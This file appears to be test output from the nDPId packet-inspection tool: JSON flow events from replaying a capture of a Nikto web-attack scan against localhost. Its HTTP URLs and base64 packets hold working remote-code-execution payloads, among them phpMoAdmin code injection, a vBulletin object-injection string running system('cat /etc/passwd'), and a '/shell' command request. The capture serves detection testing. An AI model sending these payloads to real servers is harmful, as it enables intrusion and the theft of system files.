-00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":1,"flow_last_seen":1576420277988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277988,"pkt":"AAAAAAAAAAAAAAAACABFAAFqP5xAAEAG++9\/AAABfwAAAcfiH5DrbgbETTZEsIAYAED\/XgAAAQEICp1nAAudZwALR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_packet_id":1,"flow_last_seen":1576420277989,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277989,"pkt":"AAAAAAAAAAAAAAAACABFAAFn5zlAAEAGVFV\/AAABfwAAAcfkH5BgZN5vdwnWyoAYAED\/WwAAAQEICp1nAA2dZwANR0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":1576420277991,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277991,"pkt":"AAAAAAAAAAAAAAAACABFAAFq2t9AAEAGYKx\/AAABfwAAAcfmH5C2ZOOFxq2Ns4AYAED\/XgAAAQEICp1nAA6dZwAOR0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_packet_id":1,"flow_last_seen":1576420277992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277992,"pkt":"AAAAAAAAAAAAAAAACABFAAFk9ANAAEAGR45\/AAABfwAAAcfoH5AH9M1coGd5OYAYAED\/WAAAAQEICp1nABCdZwAQR0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_packet_id":1,"flow_last_seen":1576420277993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277993,"pkt":"AAAAAAAAAAAAAAAACABFAAFnZv1AAEAG1JF\/AAABfwAAAcfqH5D+xV+iBWcClIAYAED\/WwAAAQEICp1nABGdZwARR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7440000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01249{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_packet_id":1,"flow_last_seen":1576420277997,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":644,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":644,"pkt_l4_len":610,"thread_ts_msec":1576420277997,"pkt":"AAAAAAAAAAAAAAAACABFAAJ2Zy1AAEAG01J\/AAABfwAAAcfuH5CyFV5xr3JzcYAYAEAAawAAAQEICp1nABWdZwAVR0VUIC92Yi9hamF4L2FwaS9ob29rL2RlY29kZUFyZ3VtZW50cz9hcmd1bWVudHM9TyUzQTEyJTNBJTIydkJfZEJfUmVzdWx0JTIyJTNBMiUzQSU3QnMlM0E1JTNBJTIyJTAwJTJBJTAwZGIlMjIlM0JPJTNBMTclM0ElMjJ2Ql9EYXRhYmFzZV9NeVNRTCUyMiUzQTElM0ElN0JzJTNBOSUzQSUyMmZ1bmN0aW9ucyUyMiUzQmElM0ExJTNBJTdCcyUzQTExJTNBJTIyZnJlZV9yZXN1bHQlMjIlM0JzJTNBNiUzQSUyMmFzc2VydCUyMiUzQiU3RCU3RHMlM0ExMiUzQSUyMiUwMCUyQSUwMHJlY29yZHNldCUyMiUzQnMlM0EyNSUzQSUyMnN5c3RlbSUyOCUyN2NhdCUyMCUyRmV0YyUyRnBhc3N3ZCUyNyUyOSUyMiUzQiU3RCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzA1OCkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01391{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7440000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7440000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_packet_id":1,"flow_last_seen":1576420277998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":651,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":651,"pkt_l4_len":617,"thread_ts_msec":1576420277998,"pkt":"AAAAAAAAAAAAAAAACABFAAJ9M09AAEAGByp\/AAABfwAAAcfwH5BMhgoXl7elMYAYAEAAcgAAAQEICp1nABadZwAWR0VUIC92YnVsbGV0aW4vYWpheC9hcGkvaG9vay9kZWNvZGVBcmd1bWVudHM\/YXJndW1lbnRzPU8lM0ExMiUzQSUyMnZCX2RCX1Jlc3VsdCUyMiUzQTIlM0ElN0JzJTNBNSUzQSUyMiUwMCUyQSUwMGRiJTIyJTNCTyUzQTE3JTNBJTIydkJfRGF0YWJhc2VfTXlTUUwlMjIlM0ExJTNBJTdCcyUzQTklM0ElMjJmdW5jdGlvbnMlMjIlM0JhJTNBMSUzQSU3QnMlM0ExMSUzQSUyMmZyZWVfcmVzdWx0JTIyJTNCcyUzQTYlM0ElMjJhc3NlcnQlMjIlM0IlN0QlN0RzJTNBMTIlM0ElMjIlMDAlMkElMDByZWNvcmRzZXQlMjIlM0JzJTNBMjUlM0ElMjJzeXN0ZW0lMjglMjdjYXQlMjAlMkZldGMlMkZwYXNzd2QlMjclMjklMjIlM0IlN0QgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwNTgpDQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} -01398{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7440000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00827{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_packet_id":1,"flow_last_seen":1576420278000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1576420278000,"pkt":"AAAAAAAAAAAAAAAACABFAAE4KORAAEAGEtp\/AAABfwAAAcfyH5Cd7RG\/LUrqEYAYAED\/LAAAAQEICp1nABidZwAYR0VUIC9zaGVsbD9jYXQlMjAvZXRjL3Bhc3N3ZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDg0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007084)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_packet_id":1,"flow_last_seen":1576420278001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278001,"pkt":"AAAAAAAAAAAAAAAACABFAAE9gkdAAEAGuXF\/AAABfwAAAcf0H5CX+bsaLFgA+4AYAED\/MQAAAQEICp1nABmdZwAZR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgyKQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 